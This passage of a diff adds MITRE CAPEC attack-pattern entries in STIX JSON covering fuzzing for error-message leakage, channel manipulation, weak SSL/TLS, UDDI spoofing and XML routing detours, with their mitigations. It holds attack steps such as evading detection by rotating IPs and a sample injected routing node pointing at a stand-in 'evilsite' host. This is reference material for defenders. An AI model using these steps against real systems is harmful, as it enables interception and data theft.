In this attack, the purpose of the fuzzing is to observe the application's log and error messages, although fuzzing a target can also sometimes cause the target to enter an unstable state, causing a crash.", + "external_references": [ + { + "external_id": "CAPEC-215", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/215.html" + }, + { + "external_id": "CWE-209", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/209.html" + }, + { + "external_id": "CWE-532", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/532.html" + } + ], + "id": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Fuzzing for application mapping", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6", + "attack-pattern--7f0ec88f-b057-4a73-93d8-8a30cfdbcf77" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (Information Leakage)" + ] + }, + "x_capec_domains": [ + "Software", + "Software" + ], + "x_capec_example_instances": [ + "\n The following code generates an error message that leaks the full pathname of the configuration file.\n $ConfigDir = \"/home/myprog/config\";$uname = GetUserInput(\"username\");ExitError(\"Bad hacker!\") if ($uname !~ /^\\w+$/);$file = \"$ConfigDir/$uname.txt\";if (! (-e $file)) { ExitError(\"Error: $file does not exist\"); }...\n If this code is running on a server, such as a web application, then the person making the request should not know what the full pathname of the configuration directory is. By submitting a username that does not produce a $file that exists, an attacker could get this pathname. 
It could then be used to exploit path traversal or symbolic link following problems that may exist elsewhere in the application.\n ", + "\n In languages that utilize stack traces, revealing them can give adversaries information that allows them to map functions and file locations for an application. The following Java method prints out a stack trace that exposes the application to this attack pattern.\n public void httpGet(HttpServletRequest request, HttpServletResponse response) {try {processRequest();} catch (Exception ex) {ex.printStackTrace(response.getWriter());\n return;}}\n If this code is running on a server, such as a web application, then the adversary could cause the exception to be printed through fuzzing.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Observe communication and inputs: The fuzzing adversary observes the target system looking for inputs and communications between modules, subsystems, or systems.

  2. Techniques
    Network sniffing. Using a network sniffer such as wireshark, the adversary observes communications into and out of the target system.
    Monitor API execution. Using a tool such as ktrace, strace, APISpy, or another debugging tool, the adversary observes the system calls and API calls that are made by the target system, and the nature of their parameters.
    Observe inputs using web inspection tools (OWASP's WebScarab, Paros, TamperData, TamperIE, etc.)

Experiment

  1. Generate fuzzed inputs: Given a fuzzing tool, a target input or protocol, and limits on time, complexity, and input variety, generate a list of inputs to try. Although fuzzing is random, it is not exhaustive. Parameters like length, composition, and how many variations to try are important to get the most cost-effective impact from the fuzzer.

  2. Techniques
    Boundary cases. Generate fuzz inputs that attack boundary cases of protocol fields, inputs, or other communications limits. Examples include 0xff and 0x00 for single-byte inputs. In binary situations, approach each bit of an individual field with on and off (e.g., 0x80).
    Attempt arguments to system calls or APIs. The variations include payloads that, if they were successful, could lead to a compromise on the system.
  3. Observe the outcome: Observe the outputs to the inputs fed into the system by fuzzers and see if there are any log or error messages that might provide information to map the application

Exploit

  1. Craft exploit payloads: An adversary usually needs to modify the fuzzing parameters according to the observed error messages to get the desired sensitive information for the application. To defeat correlation, the adversary may try changing the origin IP addresses or client browser identification strings or start a new session from where they left off in obfuscating the attack.

  2. Techniques
    Modify the parameters in the fuzzing tool according to the observed error messages. Repeat with enough parameters until the application has been sufficiently mapped.
    If the application rejects the large amount of fuzzing messages from the same host machine, the adversary needs to hide the attacks by changing the IP addresses or other credentials.
", + "x_capec_extended_description": "\n By observing logs and error messages, the attacker can learn details about the configuration of the target application and might be able to cause the target to disclose sensitive information. In applications that return a stack trace along with the error, this can enumerate the chain of methods that led up to the point where the error was encountered. This can not only reveal the names of the methods (some of which may have known weaknesses) but possibly also the location of class files and libraries as well as parameter values. In some cases, the stack trace might even disclose sensitive configuration or user information.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target application must fail to sanitize incoming messages adequately before processing." + ], + "x_capec_resources_required": [ + "Fuzzing tools, which automatically generate and send message variants, are necessary for this attack. The attacker must have sufficient access to send messages to the target. The attacker must also have the ability to observe the target application's log and/or error messages in order to collect information about the target." + ], + "x_capec_skills_required": { + "Medium": "Although fuzzing parameters is not difficult, and often possible with automated fuzzing tools, interpreting the error conditions and modifying the parameters so as to move further in the process of mapping the application requires detailed knowledge of target platform, the languages and packages used as well as software design." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Construct a 'code book' for error messages. 
When using a code book, application error messages aren't generated in string or stack trace form, but are catalogued and replaced with a unique (often integer-based) value 'coding' for the error. Such a technique will require helpdesk and hosting personnel to use a 'code book' or similar mapping to decode application errors/logs in order to respond to them normally.", + "id": "course-of-action--35e6212f-ac45-4ebb-88b6-9242f8ae2bba", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-215-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e83220a2-4674-498f-8f1f-684464a2de79", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--35e6212f-ac45-4ebb-88b6-9242f8ae2bba", + "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: wrap application functionality (preferably through the underlying framework) in an output encoding scheme that obscures or cleanses error messages to prevent such attacks. 
Such a technique is often used in conjunction with the above 'code book' suggestion.", + "id": "course-of-action--81ed39dc-bf22-4d9b-901c-370ff16e02f3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-215-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6313ef4d-92ce-4fa2-89d3-e46c3645bc94", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--81ed39dc-bf22-4d9b-901c-370ff16e02f3", + "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--98fe200c-e422-46ab-a1e3-1ece266fe87a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b3b7fd0f-034a-4c49-b011-83527159115d", + "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0b7e3a6f-e895-4472-8fb2-87fd4ae495ac", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c4fec7a6-c3eb-48d8-b840-e4fad7c771c8", + "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "type": "relationship", + 
"x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2827e6fe-cb69-4bb9-a62c-a073e37c5f85", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3205de43-5293-4d4e-9d84-74590957951a", + "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d3fad702-176c-4e46-ad84-47ac9e37f083", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5f23b69e-8624-4f1f-b185-f98b16b4714f", + "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3df53c6f-ed1d-45c8-9248-169adc95cc23", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0f461277-141d-4b7f-8f50-ce7f5ee71f4c", + "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d72a7c6c-d377-4769-b5de-86fe57fc39cb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"relationship_type": "mitigates", + "source_ref": "course-of-action--ac6b5101-4c5f-42e5-9d3c-ebee7b25bae7", + "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary manipulates a setting or parameter on communications channel in order to compromise its security. This can result in information exposure, insertion/removal of information from the communications stream, and/or potentially system compromise.", + "external_references": [ + { + "external_id": "CAPEC-216", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/216.html" + }, + { + "external_id": "CWE-306", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/306.html" + } + ], + "id": "attack-pattern--861cfb48-ba7c-4568-86c9-43ac6985ac65", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Communication Channel Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_precede_refs": [ + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (A successful Communication Channel Manipulation attack can result in sensitive information exposure to the adversary, thereby compromising the communication channel's confidentiality.)" + ], + "Integrity": [ + "Read Data (The adversary's injection of additional content into a communication channel negatively impacts the integrity of that channel.)", + "Modify Data (The adversary's injection of additional content into a communication channel negatively impacts the integrity of that channel.)", + "Other (The adversary's injection of additional content into a communication channel negatively impacts the integrity of that 
channel.)" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--d9904019-98fa-4beb-ae5a-f667e516269e", + "attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf" + ], + "x_capec_prerequisites": [ + "The target application must leverage an open communications channel.", + "The channel on which the target communicates must be vulnerable to interception (e.g., adversary in the middle attack - CAPEC-94)." + ], + "x_capec_resources_required": [ + "A tool that is capable of viewing network traffic and generating custom inputs to be used in the attack." + ], + "x_capec_status": "Stable", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Encrypt all sensitive communications using properly-configured cryptography.", + "id": "course-of-action--6d7d16e2-5680-47ba-942a-5b43c3541123", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-216-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c654fbc8-bc2b-454c-9398-3918f016c72b", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6d7d16e2-5680-47ba-942a-5b43c3541123", + "target_ref": "attack-pattern--861cfb48-ba7c-4568-86c9-43ac6985ac65", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design the communication system such that it associates proper authentication/authorization with each channel/message.", + "id": 
"course-of-action--fdda562a-133a-447b-9a9c-764b70f09841", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-216-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4825728c-cd47-4e1a-a705-02257ab81012", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fdda562a-133a-447b-9a9c-764b70f09841", + "target_ref": "attack-pattern--861cfb48-ba7c-4568-86c9-43ac6985ac65", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary takes advantage of incorrectly configured SSL/TLS communications that enables access to data intended to be encrypted. 
The adversary may also use this type of attack to inject commands or other traffic into the encrypted stream to cause compromise of either the client or server.", + "external_references": [ + { + "external_id": "CAPEC-217", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/217.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + } + ], + "id": "attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Exploiting Incorrectly Configured SSL/TLS", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--861cfb48-ba7c-4568-86c9-43ac6985ac65" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_example_instances": [ + "Using MITM techniques, an adversary launches a blockwise chosen-boundary attack to obtain plaintext HTTP headers by taking advantage of an SSL session using an encryption protocol in CBC mode with chained initialization vectors (IV). This allows the adversary to recover session IDs, authentication cookies, and possibly other valuable data that can be used for further exploitation. Additionally this could allow for the insertion of data into the stream, allowing for additional attacks (CSRF, SQL inject, etc) to occur." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine SSL/TLS Configuration: Determine the SSL/TLS configuration of either the server or client being targeted, preferably both. This is not a hard requirement, as the adversary can simply assume commonly exploitable configuration settings and indiscriminately attempt them.

  2. Techniques
    If the target is a webpage, some of the SSL/TLS configuration can be viewed through the browser's security information, such as the key sizes and cipher being used.

Experiment

  1. Intercept Communication: Provide controlled access to the server by the client, by either providing a link for the client to click on, or by positioning one's self at a place on the network to intercept and control the flow of data between client and server, e.g. AiTM (adversary in the middle - CAPEC-94).

  2. Techniques
    Create a malicious webpage that looks identical to the target webpage, but routes client traffic to the server such that the adversary can observe the traffic and perform an adverary in the middle attack.
    If the adversary has access to the network that either the client or server is on, the can attempt to use a packet sniffer to perform an adversary in the middle attack.
    Install a packet sniffer through malware directly to a client device that can intercept SSL/TLS traffic and perform an adversary in the middle attack.

Exploit

  1. Capture or Manipulate Sensitive Data: Once the adversary has the ability to intercept the secure communication, they exploit the incorrectly configured SSL to view the encrypted communication. The adversary can choose to just record the secure communication or manipulate the data to achieve a desired effect.

  2. Techniques
    Use known exploits for old SSL and TLS versions.
    Use known exploits for weak ciphers such as DES and RC4.
", + "x_capec_extended_description": "SSL/TLS communications become vulnerable to this attack when they use outdated versions and insecure ciphers. Currently, all SSL versions are deprecated and TLS versions 1.0 and 1.1 are also deprecated due to being insecure. It is still possible for later versions of TLS to be insecure if they are configured with insecure ciphers such as 3DES or RC4.", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Access to the client/server stream." + ], + "x_capec_resources_required": [ + "The adversary needs the ability to sniff traffic, and optionally be able to route said traffic to a system where the sniffing of traffic can take place, and act upon the recovered traffic in real time." + ], + "x_capec_skills_required": { + "High": "The adversary needs real-time access to network traffic in such a manner that the adversary can grab needed information from the SSL stream, possibly influence the decided-upon encryption method and options, and perform automated analysis to decipher encrypted material recovered. Tools exist to automate part of the tasks, but to successfully use these tools in an attack scenario requires detailed understanding of the underlying principles." + }, + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not use SSL, as all SSL versions have been broken and should not be used. 
If TLS is not an option for the client or server, consider setting timeouts on SSL sessions to extremely low values to lessen the potential impact.", + "id": "course-of-action--ecba1c64-8441-4563-b7ac-2cd839ac9937", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-217-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2583ad8a-c999-41fc-ba51-e6d47cfaa595", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ecba1c64-8441-4563-b7ac-2cd839ac9937", + "target_ref": "attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Only use TLS version 1.2+, as versions 1.0 and 1.1 are insecure.", + "id": "course-of-action--64ad9ea6-5378-4644-adf8-e1788b83cab1", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-217-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8616772d-cdb6-4317-a72a-76198cdb6d8e", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--64ad9ea6-5378-4644-adf8-e1788b83cab1", + "target_ref": "attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf", + "type": "relationship", + 
"x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configure TLS to use secure algorithms. The current recommendation is to use ECDH, ECDSA, AES256-GCM, and SHA384 for the most security.", + "id": "course-of-action--8127fe7e-3325-43cc-950b-3de6a289cc83", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-217-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7ade11c3-680d-4f17-9cad-323b3972dc32", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8127fe7e-3325-43cc-950b-3de6a289cc83", + "target_ref": "attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker spoofs a UDDI, ebXML, or similar message in order to impersonate a service provider in an e-business transaction. UDDI, ebXML, and similar standards are used to identify businesses in e-business transactions. Among other things, they identify a particular participant, WSDL information for SOAP transactions, and supported communication protocols, including security protocols. By spoofing one of these messages an attacker could impersonate a legitimate business in a transaction or could manipulate the protocols used between a client and business. 
This could result in disclosure of sensitive information, loss of message integrity, or even financial fraud.", + "external_references": [ + { + "external_id": "CAPEC-218", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/218.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + } + ], + "id": "attack-pattern--e7c0cce1-203e-454d-8a9a-76fa7ca120f8", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Spoofing of UDDI/ebXML Messages", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The targeted business's UDDI or ebXML information must be served from a location that the attacker can spoof or compromise or the attacker must be able to intercept and modify unsecured UDDI/ebXML messages in transit." + ], + "x_capec_resources_required": [ + "The attacker must be able to force the target user to accept their spoofed UDDI or ebXML message as opposed to the a message associated with a legitimate company. Depending on the follow-on for the attack, the attacker may also need to serve its own web services." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Clients should only trust UDDI, ebXML, or similar messages that are verifiably signed by a trusted party.", + "id": "course-of-action--e81399e0-9916-4bcb-8fea-d187cf0442c3", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-218-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--46bb69df-9433-4e40-8785-079dcc99916b", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e81399e0-9916-4bcb-8fea-d187cf0442c3", + "target_ref": "attack-pattern--e7c0cce1-203e-454d-8a9a-76fa7ca120f8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker subverts an intermediate system used to process XML content and forces the intermediate to modify and/or re-route the processing of the content. XML Routing Detour Attacks are Adversary in the Middle type attacks (CAPEC-94). The attacker compromises or inserts an intermediate system in the processing of the XML message. For example, WS-Routing can be used to specify a series of nodes or intermediaries through which content is passed. If any of the intermediate nodes in this route are compromised by an attacker they could be used for a routing detour attack. 
From the compromised system the attacker is able to route the XML process to other nodes of their choice and modify the responses so that the normal chain of processing is unaware of the interception. This system can forward the message to an outside entity and hide the forwarding and processing from the legitimate processing systems by altering the header information.", + "external_references": [ + { + "external_id": "CAPEC-219", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/219.html" + }, + { + "external_id": "CWE-441", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/441.html" + }, + { + "external_id": "CWE-610", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/610.html" + }, + { + "description": "Routing Detour", + "external_id": "32", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Routing-Detour" + }, + { + "description": "XML Entity Expansion", + "external_id": "44", + "source_name": "WASC", + "url": "http://projects.webappsec.org/XML-Entity-Expansion" + }, + { + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-80", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/w/page/13246956/Routing-Detour" + }, + { + "description": "Andre Yee, Threat Protection in a Service Oriented World, NFR Security", + "external_id": "REF-81", + "source_name": "reference_from_CAPEC", + "url": "http://www.unatekconference.com/images/pdfs/presentations/Yee.pdf" + }, + { + "description": "Pete Lindstrom, Attacking & Defending Web Services, 2002, SPiRE Security", + "external_id": "REF-65", + "source_name": "reference_from_CAPEC", + "url": "http://www.webtorials.com/main/comnet/cn2003/web-service/24.pdf" + } + ], + "id": "attack-pattern--9b939586-fbef-4343-94f0-0046124e3e7f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "XML Routing Detour Attacks", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n Here is an example SOAP call from a client, example1.com, to a target, example4.com, via 2 intermediaries, example2.com and example3.com. (note: The client here is not necessarily a 'end user client' but rather the starting point of the XML transaction).\n Example SOAP message with routing information in header:\n \n http://example1.com/\n http://example4.com/router\n uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f\n http://example2.com/router \n \n ...\n \n Add an additional node (example3.com/router) to the XML path in a WS-Referral message\n http://example2.com/router\n \n http://example3.com/router\n \n Resulting in the following SOAP Header:\n \n http://example1.com/\n http://example4.com/router\n uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f\n http://example2.com/router\n http://example3.com/router\n \n ...\n \n Continuing with this example, the attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header but not access the message directly on the initiator/intermediary node that they have targeted.\n Example of WS-Referral based WS-Routing injection of the bogus node route:\n \n http://example2.com/router\n \n http://evilsite1.com/router\n \n Resulting XML Routing Detour attack:\n \n http://example_0.com/\n 
http://example_4.com/router\n uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f\n http://example2.com/router\n http://evilesite1.com/router\n http://example3.com/router\n \n ...\n \n Thus, the attacker can route the XML message to the attacker controlled node (and access to the message contents).\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: Using command line or an automated tool, an attacker records all instances of web services to process XML requests.

  2. Techniques
    Use automated tool to record all instances to process XML requests or find exposed WSDL.
    Use tools to crawl WSDL

Experiment

  1. Identify SOAP messages that have multiple state processing.: Inspect instance to see whether the XML processing has multiple stages or not.

  2. Techniques
    Inspect the SOAP message routing head to see whether the XML processing has multiple stages or not.

Exploit

  1. Launch an XML routing detour attack: The attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header of the SOAP message identified in the Explore phase. Thus, the attacker can route the XML message to the attacker controlled node (and access the message contents).

  2. Techniques
    The attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header of the SOAP message
